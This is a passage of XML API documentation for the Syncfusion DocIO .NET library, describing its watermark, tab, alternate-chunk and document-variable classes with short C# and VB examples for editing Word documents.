        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns all entries of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.CheckChangedPFormat">
            <summary>
            Defines whether paragraph format is changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.UpdateXmlParts(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the XML parts.
            </summary>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.UpdateXmlPartContainer(Syncfusion.DocIO.DLS.PartContainer,Syncfusion.DocIO.DLS.PartContainer,System.String[],System.Int32)">
            <summary>
            Updates the XML part container.
            </summary>
            <param name="srcContainer">The SRC container.</param>
            <param name="destContainer">The dest container.</param>
            <param name="parts">The parts.</param>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.UpdateXmlPart(Syncfusion.DocIO.DLS.PartContainer,Syncfusion.DocIO.DLS.PartContainer,System.String)">
            <summary>
            Updates the XML part.
            </summary>
            <param name="srcContainer">The SRC container.</param>
            <param name="destContainer">The dest container.</param>
            <param name="xmlPart">The XML part.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.TargetId">
            <summary>
            Gets / sets the targer Id.
            </summary>
            <value>The Targer id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.ContentExtension">
            <summary>
            Gets / sets the Content extension.
            </summary>
            <value>The Content extension.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.ImportOption">
            <summary>
            Gets or sets the import option.
            </summary>
            <value>The import option.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.ContentType">
            <summary>
            Gets / sets the Content Type.
            </summary>
            <value>The Content Type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.ContentPath">
            <summary>
            Gets / sets the Content Path.
            </summary>
            <value>The Content Path.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.Stream">
            <summary>
            Gets the alternate chunk stream.
            </summary>
            <value>The alternate chunk stream.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AlternateChunk.ChildEntities">
            <summary>
            Gets the child entities.
            </summary>
            <value>The child entities.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Metafile.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Metafile.GetMetafileHeader">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.NamespaceDoc">
            <summary>
            Contains types that support <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> which is used to create and manipulate Word document.
            <exclude/>
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PictureWatermark">
            <summary>
            Represents the picture that appears behind the document.
            </summary>
            <example>
            <para>The following code snippet illustrates how to add a picture watermark to the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add a section and a paragraph in the document
                document.EnsureMinimal();
                IWParagraph paragraph = document.LastParagraph;
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua");
                //Create a new picture watermark
                PictureWatermark picWatermark = new PictureWatermark();
                //Set the scaling to picture
                picWatermark.Scaling = 120f;
                picWatermark.Washout = true;
                //Set the picture watermark to document
                document.Watermark = picWatermark;
                //Set the image to the picture watermark
                picWatermark.Picture = Image.FromFile(ImagesPath + "Water lilies.jpg");
                document.Save("PictureWatermark.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add a section and a paragraph in the document
                document.EnsureMinimal()
                Dim paragraph As IWParagraph = document.LastParagraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua")
                'Create a new picture watermark
                Dim picWatermark As New PictureWatermark()
                'Set the scaling to picture
                picWatermark.Scaling = 120.0F
                picWatermark.Washout = True
                Set the picture watermark to document
                document.Watermark = picWatermark
                Set the image to the picture watermark
                picWatermark.Picture = Image.FromFile(ImagesPath + "Water lilies.jpg")
                document.Save("PictureWatermark.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.Watermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextWatermark"/>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Watermark">
            <summary>
            Represents the text or picture that appears behind the document.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextWatermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Watermark.m_type">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Watermark.#ctor(Syncfusion.DocIO.DLS.WatermarkType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Watermark"/> class.
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Watermark.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.WatermarkType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Watermark"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Watermark.RemoveSelf">
            <summary>
            Removes the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Watermark.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Watermark.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Watermark.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Watermark.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Watermark.Type">
            <summary>
            Gets the watermark type. Read-Only.
            </summary>
            <value>A <see cref="T:Syncfusion.DocIO.DLS.WatermarkType"/> represents the type of watermark in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Watermark.OrderIndex">
            <summary>
            Gets or sets the index of the order.
            </summary>
            <value>The index of the order.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Watermark.ShapeId">
            <summary>
            Gets or sets the shape id.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PictureWatermark.m_picture">
            <summary>
            Picture watermark members.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.#ctor(System.Drawing.Image,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/> class with the specified 
            <see cref="T:System.Drawing.Image"/> and <see cref="P:Syncfusion.DocIO.DLS.PictureWatermark.Washout"/> effect.
            </summary>
            <param name="image">Image that appear behind the document</param>
            <param name="washout">Washout property to set light shading effect to picture.</param>
            <remarks>This constructor is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin application.</remarks>
            <example>
            <para>The following code snippet illustrates how to add a picture watermark to the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Create a new picture watermark
                PictureWatermark picWatermark = new PictureWatermark(Image.FromFile(ImagesPath + "Water lilies.jpg"), false);
                //Set the picture watermark to document
                document.Watermark = picWatermark;
                document.Save("PictureWatermark.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Create a new picture watermark
                Dim picWatermark As New PictureWatermark(Image.FromFile(ImagesPath + "Water lilies.jpg"), False)
                'Set the picture watermark to document
                document.Watermark = picWatermark
                document.Save("PictureWatermark.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.Close">
            <summary>
            Closes the instance
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.UpdateImage">
            <summary>
            Updates the image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.GetImage(System.Byte[])">
            <summary>
            Gets the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PictureWatermark.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PictureWatermark.Scaling">
            <summary>
            Gets or sets the picture scaling value in percents.
            </summary>
            <value>The <b>float</b> that specifies the picture scaling value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PictureWatermark.Washout">
            <summary>
            Gets or sets a value indicating whether the washout property is enabled for the picture watermark. The default value is <b>true</b>.
            </summary>
            <value><b>True</b> if to have light shading effect to picture; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PictureWatermark.Picture">
            <summary>
            Gets or sets the picture for picture watermark.
            </summary>
            <value>The <see cref="T:System.Drawing.Image"/> that represents the picture.</value>
            <remarks>This property is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PictureWatermark.WordPicture">
            <summary>
            Gets or sets the WPicture.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PictureWatermark.OriginalPib">
            <summary>
            Gets/sets index in BStoreContainer which contains
            picture watermark data (image). 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Tab">
            <summary>
            Represents the tabs in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to modify the existing tab values in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument("Template.docx");
                //Add the section into Word document
                WSection section = document.AddSection() as WSection;
                //Access the first paragraph of the document
                WParagraph paragraph = document.Sections[0].Paragraphs[0];
                //Get the first tab from the paragraph 
                Tab tab = paragraph.ParagraphFormat.Tabs[0];
                //Adjust the tab values
                tab.Justification = TabJustification.Centered;
                tab.Position = 200;
                tab.TabLeader = Syncfusion.DocIO.DLS.TabLeader.Dotted;
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
               Dim document As New WordDocument("Template.docx")
               'Add the section into Word document
               Dim section As WSection = TryCast(document.AddSection(), WSection)
               'Access the first paragraph of the document
               Dim paragraph As WParagraph = document.Sections(0).Paragraphs(0)
               'Get the first tab from the paragraph 
               Dim tab As Tab = paragraph.ParagraphFormat.Tabs(0)
               'Adjust the tab values
               tab.Justification = TabJustification.Centered
               tab.Position = 200
               tab.TabLeader = Syncfusion.DocIO.DLS.TabLeader.Dotted
               'Save and close the Word document instance
               document.Save("Sample.docx", FormatType.Docx)
               document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Tab.m_jc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Tab.m_tlc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Tab.m_tabPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Tab.m_tabDeletePosition">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Tab"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.Single,Syncfusion.DocIO.DLS.TabJustification,Syncfusion.DocIO.DLS.TabLeader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Tab"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="position">The position.</param>
            <param name="justification">The justification.</param>
            <param name="leader">The leader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.Single,System.Single,Syncfusion.DocIO.DLS.TabJustification,Syncfusion.DocIO.DLS.TabLeader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Tab"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="position">The position.</param>
            <param name="deletePosition">The delete position.</param>
            <param name="justification">The justification.</param>
            <param name="leader">The leader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.OnChange">
            <summary>
            Called when tab was changed.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Tab.Compare(Syncfusion.DocIO.DLS.Tab)">
            <summary>
            Compares the tabs
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Tab.Justification">
            <summary>
            Gets or sets the <see cref="T:Syncfusion.DocIO.DLS.TabJustification"/>.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TabJustification"/> member that specifies the tab justification 
            of this <see cref="T:Syncfusion.DocIO.DLS.Tab"/>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Tab.TabLeader">
            <summary>
            Gets or sets the <see cref="T:Syncfusion.DocIO.DLS.TabLeader"/>.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TabLeader"/> member that specifies the tab leader.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Tab.Position">
            <summary>
            Gets or sets the position of the tab measured in points.
            </summary>
            <value>The <b>float</b> that specifies the position of tab.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Tab.DeletePosition">
            <summary>
            Gets or sets the delete position for the tab measured in points.
            </summary>
            <value>The <b>float</b> that specifies the delete position.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextWatermark">
            <summary>
            Represents the text that appears behind the document.
            </summary>
            <example>
            <para>The following code snippet illustrates how to add a text watermark to the Word document.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add a section and a paragraph in the document
                document.EnsureMinimal();
                IWParagraph paragraph = document.LastParagraph;
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua");
                //Create a new text watermark
                TextWatermark textWatermark = new TextWatermark();
                //Set the created watermark to document
                document.Watermark = textWatermark;
                //Set the text watermark font size
                textWatermark.Size = 72;
                //Set the text watermark layout to Horizontal
                textWatermark.Layout = WatermarkLayout.Horizontal;
                textWatermark.Semitransparent = false;
                //Set the text watermark text color
                textWatermark.Color = Color.Black;
                //Set the text to text watermark text
                textWatermark.Text = "TextWatermark";
                document.Save("TextWatermark.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add a section and a paragraph in the document
                document.EnsureMinimal()
                Dim paragraph As IWParagraph = document.LastParagraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua")
                'Create a new text watermark
                Dim textWatermark As New TextWatermark()
                'Set the text watermark to document
                document.Watermark = textWatermark
                'Set the text watermark font size
                textWatermark.Size = 72
                'Set the text watermark layout to Horizontal
                textWatermark.Layout = WatermarkLayout.Horizontal
                textWatermark.Semitransparent = False
                'Set the text watermark text color
                textWatermark.Color = Color.Black
                'Set the text to the text watermark
                textWatermark.Text = "TextWatermark"
                document.Save("TextWatermark.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.Watermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWatermark.m_text">
            <summary>
            Text watermark members.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextWatermark"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextWatermark"/> class with watermark text.
            </summary>
            <param name="text">A String that appears behind the document</param>
            <example>
            <para>The following code snippet illustrates how to add a text watermark to the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template,docx");
                //Create a new text watermark
                TextWatermark textWatermark = new TextWatermark("Demo Text");
                //Set the created watermark to document
                document.Watermark = textWatermark;
                document.Save("TextWatermark.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template,docx")
                'Create a new text watermark
                Dim textWatermark As New TextWatermark("Demo Text")
                'Set the created watermark to document
                document.Watermark = textWatermark
                document.Save("TextWatermark.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.#ctor(System.String,System.String,System.Int32,Syncfusion.DocIO.DLS.WatermarkLayout)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextWatermark"/> class with the specified watermark text, font name, font size and layout options.
            </summary>
            <param name="text">A String that represents <see cref="P:Syncfusion.DocIO.DLS.TextWatermark.Text"/> which appears behind the document</param>
            <param name="fontName">A String that represents the font name for the <paramref name="text"/></param>
            <param name="fontSize">A <c>float</c> value that represents the visual appearance size for the <paramref name="text"/></param>
            <param name="layout">A <see cref="T:Syncfusion.DocIO.DLS.WatermarkLayout"/> represents the appearance position of the watermark text in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></param>
            <example>
            <para>The following code snippet illustrates how to add a text watermark to the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template,docx");
                //Create a new text watermark
                TextWatermark textWatermark = new TextWatermark("Demo Text", "Arial", 48, WatermarkLayout.Diagonal);
                //Set the created watermark to document
                document.Watermark = textWatermark;
                document.Save("TextWatermark.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template,docx")
                'Create a new text watermark
                Dim textWatermark As New TextWatermark("Demo Text", "Arial", 48, WatermarkLayout.Diagonal)
                'Set the created watermark to document
                document.Watermark = textWatermark
                document.Save("TextWatermark.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextWatermark"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextWatermark.GetShapeSize">
            <summary>
            Gets the size of the shape
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.Text">
            <summary>
            Gets or sets watermark text.
            </summary>
            <value>A String that appear behind the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.FontName">
            <summary>
            Gets or sets watermark text's font name. 
            </summary>
            <value>A String that represents the font name for the <see cref="P:Syncfusion.DocIO.DLS.TextWatermark.Text"/></value>
            <remarks>Setting new value to this <see cref="P:Syncfusion.DocIO.DLS.TextWatermark.FontName"/> is not supported in MVC6 and Xamarin application"</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.Size">
            <summary>
            Gets or sets watermark text's size. 
            </summary>
            <value>A <c>float</c> value that represents the visual appearance size for the <see cref="P:Syncfusion.DocIO.DLS.TextWatermark.Text"/></value>
            <remarks>Setting new value to this <see cref="P:Syncfusion.DocIO.DLS.TextWatermark.Size"/> is not supported in MVC6 and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.Color">
            <summary>
            Gets or sets watermark text display color.
            </summary>
            <value>A <c>Color</c> value represents the visual appearance color for the <see cref="P:Syncfusion.DocIO.DLS.TextWatermark.Text"/></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.Semitransparent">
            <summary>
            Gets or sets semitransparent property for Text watermark. The default is <b>false</b>.
            </summary>
            <value><b>True</b> if the watermark text appear as semitransparent; otherwise, <b>false</b></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.Layout">
            <summary>
            Gets or sets layout for watermark text.
            </summary>
            <value>A <see cref="T:Syncfusion.DocIO.DLS.WatermarkLayout"/> represents the appearance position of the watermark text in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.ShapeHeightInPixels">
            <summary>
            Get/set shape height in pixels.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.ShapeWidthInPixels">
            <summary>
            Get/set shape width in pixels.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextWatermark.ShapeSize">
            <summary>
            Gets shape size.
            </summary>
            <value>The size of the shape.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocVariables">
            <summary>
            Represents the Word document variables.
            </summary>
            <example>
            <para>The following code snippet illustrate how to add a DocVariable field in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("First Name of the customer: ");
                //Add the DocVariable field with Variable name and its type
                paragraph.AppendField("FirstName", FieldType.FieldDocVariable);
                paragraph = section.AddParagraph();
                paragraph.AppendText("Last Name of the customer: ");
                //Add the DocVariable field with Variable name and its type
                paragraph.AppendField("LastName", FieldType.FieldDocVariable);
                //Add the value for variable in WordDocument.Variable collection
                document.Variables.Add("FirstName", "Jeff");
                document.Variables.Add("LastName", "Smith");
                //Update the document fields
                document.UpdateDocumentFields();
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("First Name of the customer: ")
                'Add the DocVariable field with Variable name and its type
                paragraph.AppendField("FirstName", FieldType.FieldDocVariable)
                paragraph = section.AddParagraph()
                paragraph.AppendText("Last Name of the customer: ")
                'Add the DocVariable field with Variable name and its type
                paragraph.AppendField("LastName", FieldType.FieldDocVariable)
                'Add the value for variable in WordDocument.Variable collection
                document.Variables.Add("FirstName", "Jeff")
                document.Variables.Add("LastName", "Smith")
                'Update the document fields
                document.UpdateDocumentFields()
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocVariables.m_variables">
            <summary>
            Document variables
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DocVariables"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.Add(System.String,System.String)">
            <summary>
            Adds new document variable to document.
            </summary>
            <param name="name">The <b>string </b> that specifies the varaible name.</param>
            <param name="value">The <b>string </b> that specifies the varaible value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.GetNameByIndex(System.Int32)">
            <summary>
            Gets variable's key by its index.
            </summary>
            <param name="index">The <b>integer</b> that specifies the index of the variable.</param>
            <returns>The <b>string </b> that represents the key of the variable.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.GetValueByIndex(System.Int32)">
            <summary>
            Gets variable's value by the index.
            </summary>
            <param name="index">The <b>integer</b> that specifies the index of the variable.</param>
            <returns>The <b>string </b> that represents the value of the variable.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.Remove(System.String)">
            <summary>
            Removes document variable with specified name from the document.
            </summary>
            <param name="name">The <b>string </b> that represents the name of the variable.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.UpdateVariables(System.Byte[])">
            <summary>
